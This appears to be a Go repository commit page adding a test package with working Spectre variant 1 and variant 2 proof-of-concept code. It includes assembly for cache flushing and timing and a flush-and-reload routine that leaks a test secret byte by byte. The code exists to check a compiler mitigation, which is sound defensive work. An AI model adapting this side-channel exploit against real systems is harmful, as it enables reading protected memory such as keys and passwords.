aboutsummaryrefslogtreecommitdiff
path: root/misc
diff options
context:
space:
mode:
authorRuss Cox <rsc@golang.org>2020-03-11 11:54:56 -0400
committerRuss Cox <rsc@golang.org>2020-03-13 19:06:00 +0000
commitbe72e3c3ff21a22bf8162965533672994e670985 (patch)
treef7368c74b8a416270497746f88deee32ac71b2dd /misc
parentfc8a6336d1ad29acf2c7728ce669df9059169132 (diff)
downloadgo-be72e3c3ff21a22bf8162965533672994e670985.tar.gz
go-be72e3c3ff21a22bf8162965533672994e670985.zip
misc/spectre: add spectre index test
Test for CL 222660. Change-Id: I1dae41a9746dfc4144a0d29c02201de8ecd216fd Reviewed-on: https://go-review.googlesource.com/c/go/+/222978 Reviewed-by: Keith Randall <khr@golang.org>
Diffstat (limited to 'misc')
-rw-r--r--misc/spectre/asm_amd64.s51
-rw-r--r--misc/spectre/doc.go7
-rw-r--r--misc/spectre/index_test.go59
-rw-r--r--misc/spectre/spectre_amd64_test.go282
4 files changed, 399 insertions, 0 deletions
diff --git a/misc/spectre/asm_amd64.s b/misc/spectre/asm_amd64.s
new file mode 100644
index 00000000000..6daa8a7d406
--- /dev/null
+++ b/misc/spectre/asm_amd64.s
@@ -0,0 +1,51 @@
+// Copyright 2020 The Go Authors. All rights reserved.
+// Use of this source code is governed by a BSD-style
+// license that can be found in the LICENSE file.
+
+#include "textflag.h"
+
+TEXT ·clflush(SB),NOSPLIT,$0-8
+ MOVQ arg+0(FP), AX
+ CLFLUSH 0(AX)
+ RET
+
+TEXT ·rdtscp(SB),NOSPLIT,$0-8
+ RDTSCP
+ SHLQ $32, DX
+ ORQ DX, AX
+ MOVQ AX, ret+0(FP)
+ RET
+
+TEXT ·nop(SB),NOSPLIT,$0-0
+ RET
+
+TEXT ·cpuid(SB),NOSPLIT,$0-0
+ CPUID
+ RET
+
+TEXT ·features(SB),NOSPLIT,$0-2
+ MOVL $0, AX
+ MOVL $0, CX
+ CPUID
+ CMPL AX, $1
+ JLT none
+
+ MOVL $1, AX
+ MOVL $0, CX
+ CPUID
+ SHRL $19, DX
+ ANDL $1, DX
+ MOVB DX, hasCLFLUSH+0(FP)
+
+ MOVL $0x80000001, AX
+ MOVL $0, CX
+ CPUID
+ SHRL $27, DX
+ ANDL $1, DX
+ MOVB DX, hasRDTSCP+0(FP)
+ RET
+
+none:
+ MOVB $0, hasCLFLUSH+0(FP)
+ MOVB $0, hasRDTSCP+1(FP)
+ RET
diff --git a/misc/spectre/doc.go b/misc/spectre/doc.go
new file mode 100644
index 00000000000..cd068feab78
--- /dev/null
+++ b/misc/spectre/doc.go
@@ -0,0 +1,7 @@
+// Copyright 2020 The Go Authors. All rights reserved.
+// Use of this source code is governed by a BSD-style
+// license that can be found in the LICENSE file.
+
+// Package spectre contains a Spectre test.
+// It only runs on certain architectures.
+package spectre
diff --git a/misc/spectre/index_test.go b/misc/spectre/index_test.go
new file mode 100644
index 00000000000..a5ff7306319
--- /dev/null
+++ b/misc/spectre/index_test.go
@@ -0,0 +1,59 @@
+// Copyright 2020 The Go Authors. All rights reserved.
+// Use of this source code is governed by a BSD-style
+// license that can be found in the LICENSE file.
+
+package spectre
+
+import "testing"
+
+func shouldPanic(f func()) {
+ defer func() {
+ if recover() == nil {
+ panic("index did not panic")
+ }
+ }()
+ f()
+}
+
+var (
+ Zero = 0
+ One = 1
+ Two = 2
+ Three = 3
+ Four = 4
+ Five = 5
+)
+
+func TestIndex(t *testing.T) {
+ xs := "hello"
+ xi := []int{10, 20, 30, 40, 50}
+ xf := []float64{10, 20, 30, 40, 50}
+
+ xs = xs[Zero:Five]
+ xi = xi[Zero:Five]
+ xf = xf[Zero:Five]
+
+ if xs[Four] != 'o' {
+ t.Errorf("xs[4] = %q, want %q", xs[Four], 'o')
+ }
+ if xi[Four] != 50 {
+ t.Errorf("xi[4] = %d, want 50", xi[Four])
+ }
+ if xf[Four] != 50 {
+ t.Errorf("xf[4] = %v, want 50", xf[Four])
+ }
+
+ xs1 := xs[One:]
+ xi1 := xi[One:]
+ xf1 := xf[One:]
+
+ if xs1[Three] != 'o' {
+ t.Errorf("xs1[3] = %q, want %q", xs1[Three], 'o')
+ }
+ if xi1[Three] != 50 {
+ t.Errorf("xi1[3] = %d, want 50", xi1[Three])
+ }
+ if xf1[Three] != 50 {
+ t.Errorf("xf1[3] = %v, want 50", xf1[Three])
+ }
+}
diff --git a/misc/spectre/spectre_amd64_test.go b/misc/spectre/spectre_amd64_test.go
new file mode 100644
index 00000000000..7970d3c5cb6
--- /dev/null
+++ b/misc/spectre/spectre_amd64_test.go
@@ -0,0 +1,282 @@
+// Copyright 2020 The Go Authors. All rights reserved.
+// Use of this source code is governed by a BSD-style
+// license that can be found in the LICENSE file.
+
+package spectre
+
+import (
+ "flag"
+ "sort"
+ "sync/atomic"
+ "testing"
+ "unsafe"
+)
+
+// asm_amd64.s
+func nop()
+func cpuid()
+func clflush(unsafe.Pointer)
+func rdtscp() int64
+func features() (cpuid, rdtscp bool)
+
+// Victim program
+
+type victimStruct struct {
+ secret []byte
+ pad1 [4]int
+ slice1 []byte // starts on word 7 of struct, so len is in word 8, new cache line
+ pad2 [6 + 7]int // cache-line aligned again
+ slice2 []int
+ pad2b [6]int // cache-line aligned again
+ timingArray [256]struct {
+ pad [1024 - 4]byte
+ data int32
+ }
+ pad3 [1024 - 4]byte
+ temp int32
+ pad5 [1024]byte
+ slice2data [8]int
+ f uintptr
+}
+
+var v *victimStruct
+
+func init() {
+ // Allocate dynamically to force 64-byte alignment.
+ // A global symbol would only be 32-byte aligned.
+ v = new(victimStruct)
+ if uintptr(unsafe.Pointer(v))&63 != 0 {
+ panic("allocation not 64-byte aligned")
+ }
+ v.secret = []byte("The Magic Words are Squeamish Gossifrage")
+ v.slice1 = []byte{1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16}
+ v.slice2 = v.slice2data[:]
+ f := nop
+ v.f = *(*uintptr)(unsafe.Pointer(&f))
+}
+
+// Spectre variant 1. (BCB - Bounds Check Bypass)
+// Speculation fetches from v.timingArray even if i is out of bounds in v.slice1[i].
+
+func victim1(i int) {
+ if uint(i) < uint(len(v.slice1)) {
+ v.temp ^= v.timingArray[v.slice1[i]].data
+ }
+}
+
+func spectre1(innocent, target int) {
+ for j := 31; j >= 0; j-- {
+ // Flush the cache line holding the slice len (but not the base pointer).
+ // This makes the test in victim1 need to fetch from main memory,
+ // increasing the window during which the CPU speculates ahead.
+ // The CPUID waits for the CLFLUSH to finish.
+ clflush(unsafe.Pointer(uintptr(unsafe.Pointer(&v.slice1)) + 8))
+ cpuid()
+ mask := (j - 1) >> 8 // 0 on most rounds, -1 on last
+ victim1(innocent&^mask | target&mask)
+ }
+}
+
+// Spectre variant 1 again, with implicit bounds check provided by Go.
+// Speculation fetches from v.timingArray even if i is out of bounds in v.slice1[i].
+
+func victim1Implicit(i int) {
+ defer func() {
+ recover()
+ }()
+ v.temp ^= v.timingArray[v.slice1[i]].data
+}
+
+func spectre1Implicit(innocent, target int) {
+ // Same as spectre1 above, calling victim1implicit.
+ for j := 31; j >= 0; j-- {
+ clflush(unsafe.Pointer(uintptr(unsafe.Pointer(&v.slice1)) + 8))
+ cpuid()
+ mask := (j - 1) >> 8 // 0 on most rounds, -1 on last
+ victim1Implicit(innocent&^mask | target&mask)
+ }
+}
+
+// Spectre variant 2 victim gadget. (BTI - Branch Target Injection)
+// Will speculate that final call is to victimType.Victim instead of attackerType.Victim.
+
+type victimType int
+
+func (i victimType) Victim() {
+ victim1(int(i))
+}
+
+type attackerType int
+
+func (attackerType) Victim() {}
+
+func spectre2(innocent, target int) {
+ list := make([]interface{ Victim() }, 128)
+ list[0] = victimType(innocent)
+ vi := list[0]
+ for i := range list {
+ list[i] = vi
+ }
+ list[len(list)-1] = attackerType(target)
+
+ av := &list[len(list)-1]
+ // The 24 here is the offset of the first method in the itab.
+ itab := unsafe.Pointer(uintptr(**(**unsafe.Pointer)(unsafe.Pointer(&av))) + 24)
+
+ for _, vi := range list {
+ clflush(itab)
+ clflush(unsafe.Pointer(uintptr(unsafe.Pointer(&v.slice1)) + 8))
+ cpuid()
+ vi.Victim()
+ }
+}
+
+// General attack.
+
+func readbyte(target int, spectre func(int, int)) byte {
+ for tries := 0; tries < 10; tries++ {
+ var times [256][8]int
+ for round := range times[0] {
+ // Flush timingArray.
+ for j := range times {
+ clflush(unsafe.Pointer(&v.timingArray[j].data))
+ }
+
+ // Speculate load from timingArray.
+ innocent := round % 16
+ spectre(innocent, target)
+
+ // Measure access times for vtimingArray.
+ // The atomic.LoadInt32 is not for synchronization
+ // but instead something that the compiler won't optimize away or move.
+ for j := range times {
+ pj := (j*167 + 234) & 255 // permuted j to confuse prefetch
+ atomic.LoadInt32(&dummy[0])
+ addr := &v.timingArray[byte(pj)].data
+ t := rdtscp()
+ dummy[0] += int32(*addr)
+ t = rdtscp() - t
+ times[pj][round] = int(t)
+ }
+ }
+
+ found := 0
+ var c byte
+ for j := range times {
+ _, avg, _ := stats(times[j][:])
+ if hitMin/2 <= avg && avg <= 2*hitMax {
+ found++
+ c = byte(j)
+ }
+ }
+ if found == 1 {
+ return c
+ }
+ if found > 10 {
+ return 0
+ }
+ }
+ return 0
+}
+
+var leakFixed = flag.Bool("leakfixed", false, "expect leak to be fixed")
+
+func testSpectre(t *testing.T, spectre func(int, int)) {
+ if cpuid, rdtscp := features(); !cpuid {
+ t.Skip("CPUID not available")
+ } else if !rdtscp {
+ t.Skip("RDTSCP not available")
+ }
+
+ t.Logf("hit %d %d %d vs miss %d %d %d\n", hitMin, hitAvg, hitMax, missMin, missAvg, missMax)
+ if missMin/2 < hitMax {
+ t.Fatalf("cache misses vs cache hits too close to call")
+ return
+ }
+
+ offset := int(uintptr(unsafe.Pointer(&v.secret[0])) - uintptr(unsafe.Pointer(&v.slice1[0])))
+ // fmt.Printf("offset %d\n", offset)
+ buf := make([]byte, 40)
+ for i := 0; i < 40; i++ {
+ buf[i] = readbyte(offset+i, spectre)
+ }
+ found := string(buf)
+
+ // Don't insist on the whole string, but expect most of it.
+ leaked := 0
+ for i := range found {
+ if found[i] == v.secret[i] {
+ leaked++
+ }
+ }
+ if !*leakFixed && leaked < len(found)/2 {
+ t.Fatalf("expected leak; found only %q", found)
+ }
+ if *leakFixed && leaked > 0 {
+ t.Fatalf("expected no leak; found %q", found)
+ }
+}
+
+func TestSpectre1(t *testing.T) {
+ testSpectre(t, spectre1)
+}
+
+func TestSpectre1Implicit(t *testing.T) {
+ testSpectre(t, spectre1Implicit)
+}
+
+func TestSpectre2(t *testing.T) {
+ testSpectre(t, spectre2)
+}
+
+var (
+ hitMin, hitAvg, hitMax = measure(-1, 500)
+ missMin, missAvg, missMax = measure(500, 500)
+)
+
+var dummy [1024]int32
+
+func measure(flush, probe int) (min, avg, max int) {
+ var times [100]int
+ for i := range times {
+ if flush >= 0 {
+ clflush(unsafe.Pointer(&dummy[flush]))
+ }
+ // The atomic.LoadInt32 is not for synchronization
+ // but instead something that the compiler won't optimize away or move.
+ t := rdtscp()
+ dummy[0] += atomic.LoadInt32(&dummy[probe])
+ times[i] = int(rdtscp() - t)
+ }
+ return stats(times[:])
+}
+
+func stats(x []int) (min, avg, max int) {
+ // Discard outliers.
+ sort.Ints(x)
+ q1 := x[len(x)/4]
+ q3 := x[len(x)*3/4]
+ lo := q1 - (q3-q1)*3/2
+ hi := q3 + (q3-q1)*3/2
+ i := 0
+ for i < len(x) && x[i] < lo {
+ i++
+ }
+ j := len(x)
+ for j-1 > i && x[j-1] > hi {
+ j--
+ }
+ if i < j {
+ x = x[i:j]
+ }
+
+ min = x[0]
+ max = x[len(x)-1]
+
+ avg = 0
+ for _, v := range x {
+ avg += v
+ }
+ avg /= len(x)
+ return min, avg, max
+}